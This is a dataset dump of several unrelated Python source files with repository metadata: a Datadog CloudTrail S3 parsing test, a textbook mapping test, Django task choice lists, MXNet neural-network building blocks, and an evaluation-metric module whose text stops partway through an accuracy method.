max_stars:  aws/logs_monitoring/tests/test_cloudtrail_s3.py | rkitron/datadog-serverless-functions | d69fe6fdb489c262ffa76a529b22f2a81ae6deba | ["Apache-2.0"] | count: 232 | events: 2018-11-20T16:57:04.000Z / 2022-03-23T14:38:11.000Z
max_issues: aws/logs_monitoring/tests/test_cloudtrail_s3.py | rkitron/datadog-serverless-functions | d69fe6fdb489c262ffa76a529b22f2a81ae6deba | ["Apache-2.0"] | count: 207 | events: 2018-10-25T11:48:20.000Z / 2022-03-23T00:21:10.000Z
max_forks:  aws/logs_monitoring/tests/test_cloudtrail_s3.py | rkitron/datadog-serverless-functions | d69fe6fdb489c262ffa76a529b22f2a81ae6deba | ["Apache-2.0"] | count: 308 | events: 2018-10-24T13:36:05.000Z / 2022-03-21T21:17:02.000Z
content:
from unittest.mock import MagicMock, patch
import os
import sys
import unittest
import json
import copy
import io
import gzip
sys.modules["trace_forwarder.connection"] = MagicMock()
sys.modules["datadog_lambda.wrapper"] = MagicMock()
sys.modules["datadog_lambda.metric"] = MagicMock()
sys.modules["datadog"] = MagicMock()
sys.modules["requests"] = MagicMock()
sys.modules["requests_futures.sessions"] = MagicMock()
env_patch = patch.dict(
os.environ,
{
"DD_API_KEY": "11111111111111111111111111111111",
"DD_ADDITIONAL_TARGET_LAMBDAS": "ironmaiden,megadeth",
},
)
env_patch.start()
import lambda_function
import parsing
env_patch.stop()
class Context:
function_version = 0
invoked_function_arn = "invoked_function_arn"
function_name = "function_name"
memory_limit_in_mb = "10"
test_data = {
"Records": [
{
"eventVersion": "1.08",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAYYB64AB3HGPQO2EPR:DatadogAWSIntegration",
"arn": "arn:aws:sts::601427279990:assumed-role/Siti_DatadogAWSIntegrationRole/i-08014e4f62ccf762d",
"accountId": "601427279990",
"accessKeyId": "ASIAYYB64AB3DWOY7JNT",
"sessionContext": {
"sessionIssuer": {
"type": "Role",
"principalId": "AROAYYB64AB3HGPQO2EPR",
"arn": "arn:aws:iam::601427279990:role/Siti_DatadogAWSIntegrationRole",
"accountId": "601427279990",
"userName": "Siti_DatadogAWSIntegrationRole",
},
"attributes": {
"creationDate": "2021-05-02T23:49:01Z",
"mfaAuthenticated": "false",
},
},
},
"eventTime": "2021-05-02T23:53:28Z",
"eventSource": "dynamodb.amazonaws.com",
"eventName": "DescribeTable",
"awsRegion": "us-east-1",
"sourceIPAddress": "54.162.201.161",
"userAgent": "Datadog",
"requestParameters": {"tableName": "KinesisClientLibraryLocal"},
"responseElements": None,
"requestID": "A9K7562IBO4MPDQE4O5G9QETRFVV4KQNSO5AEMVJF66Q9ASUAAJG",
"eventID": "a5dd11f9-f616-4ea8-8030-0b3eef554352",
"readOnly": True,
"resources": [
{
"accountId": "601427279990",
"type": "AWS::DynamoDB::Table",
"ARN": "arn:aws:dynamodb:us-east-1:601427279990:table/KinesisClientLibraryLocal",
}
],
"eventType": "AwsApiCall",
"apiVersion": "2012-08-10",
"managementEvent": True,
"recipientAccountId": "601427279990",
"eventCategory": "Management",
}
]
}
def test_data_gzipped() -> io.BytesIO:
return io.BytesIO(
gzip.compress(json.dumps(copy.deepcopy(test_data)).encode("utf-8"))
)
class TestS3CloudwatchParsing(unittest.TestCase):
def setUp(self):
self.maxDiff = 9000
@patch("parsing.boto3")
@patch("lambda_function.boto3")
    def test_s3_cloudtrail_parsing_and_enrichment(self, lambda_boto3, parsing_boto3):
context = Context()
boto3 = parsing_boto3.client()
boto3.get_object.return_value = {"Body": test_data_gzipped()}
payload = {
"s3": {
"bucket": {
"name": "test-bucket",
},
"object": {
"key": "601427279990_CloudTrail_us-east-1_20210503T0000Z_QrttGEk4ZcBTLwj5.json.gz"
},
}
}
result = parsing.parse({"Records": [payload]}, context)
expected = copy.deepcopy([test_data["Records"][0]])
expected[0].update(
{
"ddsource": "cloudtrail",
"ddsourcecategory": "aws",
"service": "cloudtrail",
"aws": {
"s3": {
"bucket": payload["s3"]["bucket"]["name"],
"key": payload["s3"]["object"]["key"],
},
"function_version": context.function_version,
"invoked_function_arn": context.invoked_function_arn,
},
}
)
# yeah, there are tags, but we don't care to compare them
result[0].pop("ddtags")
# expected parsed result, now testing enrichment
self.assertEqual(expected[0], result[0])
expected[0]["host"] = "i-08014e4f62ccf762d"
self.assertEqual(expected[0], lambda_function.enrich(result)[0])
if __name__ == "__main__":
unittest.main()
avg_line_length: 32.231788 | max_line_length: 115 | alphanum_fraction: 0.543661 | count_classes: 1,861 | score_classes: 0.382371 | count_generators: 0 | score_generators: 0 | count_decorators: 1,602 | score_decorators: 0.329156 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,958 | score_documentation: 0.402301
hexsha: 12fc144c5d332d1edd841f8f777a22d5c30bf0b9 | size: 487 | ext: py | lang: Python
max_stars:  ch_06/tests/test_lookup_mapping.py | real-slim-chadi/Python-Object-Oriented-Programming---4th-edition | 7c486866171786b620795fa33a79ec9ac9a8ba1b | ["MIT"] | count: 43 | events: 2021-06-03T18:39:09.000Z / 2022-03-29T20:32:13.000Z
max_issues: ch_06/tests/test_lookup_mapping.py | real-slim-chadi/Python-Object-Oriented-Programming---4th-edition | 7c486866171786b620795fa33a79ec9ac9a8ba1b | ["MIT"] | count: 16 | events: 2022-02-08T22:41:30.000Z / 2022-03-25T22:48:28.000Z
max_forks:  ch_06/tests/test_lookup_mapping.py | real-slim-chadi/Python-Object-Oriented-Programming---4th-edition | 7c486866171786b620795fa33a79ec9ac9a8ba1b | ["MIT"] | count: 36 | events: 2021-06-19T07:14:09.000Z / 2022-03-12T22:17:09.000Z
content:
"""
Python 3 Object-Oriented Programming
Chapter 6, Abstract Base Classes and Operator Overloading
"""
from lookup_mapping import Lookup
def test_lookup_mapping():
x = Lookup(
[
["z", "Zillah"],
["a", "Amy"],
["c", "Clara"],
["b", "Basil"],
]
)
assert "a" in x
assert "d" not in x
assert len(x) == 4
assert x["a"] == "Amy"
assert x["z"] == "Zillah"
assert list(x) == ["a", "b", "c", "z"]
avg_line_length: 20.291667 | max_line_length: 57 | alphanum_fraction: 0.486653 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 179 | score_documentation: 0.367556
hexsha: 12fd58577de1528a698dc2d572273da89af94b00 | size: 217 | ext: py | lang: Python
max_stars:  serempre_todo/utils/choices.py | pygabo/Serempre | 6b29e337abd8d1b3f71ee889d318a2d473d6c744 | ["MIT"] | count: null | events: null / null
max_issues: serempre_todo/utils/choices.py | pygabo/Serempre | 6b29e337abd8d1b3f71ee889d318a2d473d6c744 | ["MIT"] | count: null | events: null / null
max_forks:  serempre_todo/utils/choices.py | pygabo/Serempre | 6b29e337abd8d1b3f71ee889d318a2d473d6c744 | ["MIT"] | count: null | events: null / null
content:
TASK_STATUS = [
('TD', 'To Do'),
('IP', 'In Progress'),
('QA', 'Testing'),
('DO', 'Done'),
]
TASK_PRIORITY = [
('ME', 'Medium'),
('HI', 'Highest'),
('HG', 'High'),
('LO', 'Lowest'),
]
avg_line_length: 15.5 | max_line_length: 26 | alphanum_fraction: 0.40553 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 98 | score_documentation: 0.451613
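The two lists in the file above follow Django's (value, label) choices convention. The sketch below shows how a model might consume them; the Task model and its fields are illustrative, not taken from the repository.

from django.db import models
from serempre_todo.utils.choices import TASK_STATUS, TASK_PRIORITY
class Task(models.Model):  # hypothetical model, for illustration only
    title = models.CharField(max_length=120)
    status = models.CharField(max_length=2, choices=TASK_STATUS, default='TD')
    priority = models.CharField(max_length=2, choices=TASK_PRIORITY, default='ME')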
hexsha: 12fda5a81fde9ab3c46b39a497e89d5ab29b6639 | size: 17,673 | ext: py | lang: Python
max_stars:  symbols/block.py | zerofo/sdu-face-alignment | f4b57fde0576d2327369884fd5d5e9a7765a0790 | ["MIT"] | count: 192 | events: 2019-03-27T02:40:41.000Z / 2022-03-18T15:35:17.000Z
max_issues: symbols/block.py | zerofo/sdu-face-alignment | f4b57fde0576d2327369884fd5d5e9a7765a0790 | ["MIT"] | count: 4 | events: 2019-04-01T14:51:22.000Z / 2020-11-25T08:22:04.000Z
max_forks:  symbols/block.py | zerofo/sdu-face-alignment | f4b57fde0576d2327369884fd5d5e9a7765a0790 | ["MIT"] | count: 38 | events: 2019-03-30T05:33:48.000Z / 2021-10-01T06:08:17.000Z
content:
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import mxnet as mx
import numpy as np
from config import config
def Conv(**kwargs):
body = mx.sym.Convolution(**kwargs)
return body
def Act(data, act_type, name):
if act_type=='prelu':
body = mx.sym.LeakyReLU(data = data, act_type='prelu', name = name)
else:
body = mx.symbol.Activation(data=data, act_type=act_type, name=name)
return body
def ConvFactory(data, num_filter, kernel, stride=(1, 1), pad=(0, 0), act_type="relu", mirror_attr={}, with_act=True, dcn=False, name=''):
bn_mom = config.bn_mom
workspace = config.workspace
if not dcn:
conv = mx.symbol.Convolution(
data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv')
else:
conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
if with_act:
act = Act(bn, act_type, name=name+'_relu')
#act = mx.symbol.Activation(
# data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
return act
else:
return bn
def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
#if binarize:
# conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
if not dcn:
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
if not dcn:
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
if not dcn:
conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv3')
else:
conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
if binarize:
conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
#assert(False)
shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv4 + shortcut
#return bn4 + shortcut
#return act4 + shortcut
def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
M = 1.0
tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
assert not binarize
if stride[0]>1 or not dim_match:
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
conv4 = block35(data, num_filter, name=name+'_block35')
return conv4
def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
workspace = config.workspace
if stride[0]>1 or not dim_match:
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
return cab.get()
def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
if config.net_block=='resnet':
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='inception':
return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='hpm':
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='cab':
return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
#def lin(data, num_filter, workspace, name, binarize, dcn):
# bit = 1
# ACT_BIT = config.ACT_BIT
# bn_mom = config.bn_mom
# workspace = config.workspace
# if not binarize:
# if not dcn:
# conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv')
# bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# return act1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
# num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
# conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
# num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
# #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
# # no_bias=False, workspace=workspace, name=name + '_conv')
# return conv1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
# conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
# return conv1
def lin3(data, num_filter, workspace, name, k, g=1, d=1):
bn_mom = config.bn_mom
workspace = config.workspace
if k!=3:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
no_bias=True, workspace=workspace, name=name + '_conv')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
no_bias=True, workspace=workspace, name=name + '_conv')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
ret = act1
return ret
class CAB:
def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
self.data = data
self.nFilters = nFilters
self.nModules = nModules
self.n = n
self.workspace = workspace
self.name = name
self.dilate = dilate
self.group = group
self.sym_map = {}
def get_output(self, w, h):
key = (w, h)
if key in self.sym_map:
return self.sym_map[key]
ret = None
if h==self.n:
if w==self.n:
ret = (self.data, self.nFilters)
else:
x = self.get_output(w+1, h)
f = int(x[1]*0.5)
if w!=self.n-1:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
else:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
ret = (body,f)
else:
x = self.get_output(w+1, h+1)
y = self.get_output(w, h+1)
if h%2==1 and h!=w:
xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
#xbody = xbody+x[0]
else:
xbody = x[0]
#xbody = x[0]
#xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
if w==0:
ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
else:
ybody = y[0]
ybody = mx.sym.concat(y[0], ybody, dim=1)
body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
body = body/2
ret = (body, x[1])
self.sym_map[key] = ret
return ret
def get(self):
return self.get_output(1, 1)[0]
avg_line_length: 54.378462 | max_line_length: 148 | alphanum_fraction: 0.62106 | count_classes: 1,911 | score_classes: 0.108131 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 3,220 | score_documentation: 0.182199
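A minimal sketch of how the building blocks in the file above could be chained into a symbol. It assumes the config fields the module reads (net_block, bn_mom, workspace, and so on) are already populated and that the module is importable as symbols.block; the filter counts and layer names are arbitrary.

import mxnet as mx
from symbols.block import ConvFactory, conv_block
# Hypothetical composition of the blocks above (filter counts/names are arbitrary):
data = mx.sym.Variable('data')
body = ConvFactory(data, 64, (7, 7), stride=(2, 2), pad=(3, 3), name='stem')
body = conv_block(body, num_filter=128, stride=(2, 2), dim_match=False, name='stage1_unit1', binarize=False, dcn=False, dilate=1)
body = conv_block(body, num_filter=128, stride=(1, 1), dim_match=True, name='stage1_unit2', binarize=False, dcn=False, dilate=1)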
hexsha: 12fde371c750b67c435196b6031afbfb913cf73d | size: 9,198 | ext: py | lang: Python
max_stars:  train/metric.py | alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates | 1641b59b73c951a5b05d17b5528894ae73a014b8 | ["MIT"] | count: 54 | events: 2020-06-16T08:11:21.000Z / 2022-03-18T14:54:52.000Z
max_issues: train/metric.py | alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates | 1641b59b73c951a5b05d17b5528894ae73a014b8 | ["MIT"] | count: 10 | events: 2020-06-23T07:57:45.000Z / 2021-12-16T04:18:03.000Z
max_forks:  train/metric.py | alexandrosstergiou/Squeeze-and-Recursion-Temporal-Gates | 1641b59b73c951a5b05d17b5528894ae73a014b8 | ["MIT"] | count: 7 | events: 2020-09-12T12:46:54.000Z / 2021-11-15T09:00:55.000Z
content:
'''
--- I M P O R T S T A T E M E N T S ---
'''
import coloredlogs, logging
coloredlogs.install()
import numpy as np
'''
=== S T A R T O F C L A S S E V A L M E T R I C ===
[About]
Object class for calculating average values.
[Init Args]
- name: String for the variable name to calculate average value for.
[Methods]
- __init__ : Class initialiser
- update : Function to be implemented by the children sub-classes.
- reset : Function for resetting the number of instances and the sum of the metric.
- get : Calculation of the average value based on the number of instances and the provided sum.
- get_name_value : Function for returning the name(s) and the value(s).
- check_label_shapes : Function responsible for type and shape checking.
'''
class EvalMetric(object):
def __init__(self, name, **kwargs):
self.name = str(name)
self.reset()
def update(self, preds, labels, losses, lr, batch_size):
raise NotImplementedError('Must be implemented in child classes!')
def reset(self):
self.num_inst = 0
self.sum_metric = 0.0
def get(self):
# case that instances are 0 -> return NaN
if self.num_inst == 0:
return (self.name, float('nan'))
# case that instances are 1 -> return their sum
if self.num_inst == 1:
return(self.name, self.sum_metric)
# case that instances are >1 -> return average
else:
return (self.name, self.sum_metric / self.num_inst)
def get_name_value(self):
name, value = self.get()
if not isinstance(name, list):
name = [name]
if not isinstance(value, list):
value = [value]
return list(zip(name, value))
def check_label_shapes(self, preds, labels):
# raise if the shape is inconsistent
if (type(labels) is list) and (type(preds) is list):
label_shape, pred_shape = len(labels), len(preds)
else:
label_shape, pred_shape = labels.shape[0], preds.shape[0]
if label_shape != pred_shape:
raise NotImplementedError("")
'''
=== E N D O F C L A S S E V A L M E T R I C ===
'''
'''
=== S T A R T O F C L A S S M E T R I C L I S T ===
[About]
EvalMetric class for creating a list containing Evalmetric objects.
[Init Args]
- name: String for the variable name.
[Methods]
- __init__ : Class initialiser
- update : Function to update the list of EvalMetric objects.
- reset : Function for resetting the list.
- get : Function for getting each of the EvalMetric objects in the list.
- get_name_value : Function for getting the name of the list items.
'''
class MetricList(EvalMetric):
def __init__(self, *args, name="metric_list"):
assert all([issubclass(type(x), EvalMetric) for x in args]), \
"MetricList input is illegal: {}".format(args)
self.metrics = [metric for metric in args]
super(MetricList, self).__init__(name=name)
def update(self, preds, labels, losses=None, lr=None, batch_size=None):
preds = [preds] if type(preds) is not list else preds
labels = [labels] if type(labels) is not list else labels
losses = [losses] if type(losses) is not list else losses
lr = [lr] if type(lr) is not list else lr
batch_size = [batch_size] if type(batch_size) is not list else batch_size
for metric in self.metrics:
metric.update(preds, labels, losses, lr, batch_size)
def reset(self):
if hasattr(self, 'metrics'):
for metric in self.metrics:
metric.reset()
else:
logging.warning("No metric defined.")
    def get(self):
        outputs = []
        for metric in self.metrics:
            outputs.append(metric.get())
        return outputs
    def get_name_value(self):
        outputs = []
        for metric in self.metrics:
            outputs.append(metric.get_name_value())
        return outputs
'''
=== E N D O F C L A S S M E T R I C L I S T ===
'''
'''
=== S T A R T O F C L A S S A C C U R A C Y ===
[About]
EvalMetric class for creating an accuracy estimate.
[Init Args]
- name: String for the variable name. Defaults to `accuracy`.
- topk: Number of top predictions to be used of the score (top-1, top-5 etc.).
Defaults to 1.
[Methods]
- __init__ : Class initialiser
- update : Function to update scores.
'''
class Accuracy(EvalMetric):
def __init__(self, name='accuracy', topk=1):
super(Accuracy, self).__init__(name)
self.topk = topk
def update(self, preds, labels, losses, lr, batch_size):
preds = [preds] if type(preds) is not list else preds
labels = [labels] if type(labels) is not list else labels
self.check_label_shapes(preds, labels)
for pred, label in zip(preds, labels):
assert self.topk <= pred.shape[1], \
"topk({}) should no larger than the pred dim({})".format(self.topk, pred.shape[1])
_, pred_topk = pred.topk(self.topk, 1, True, True)
pred_topk = pred_topk.t()
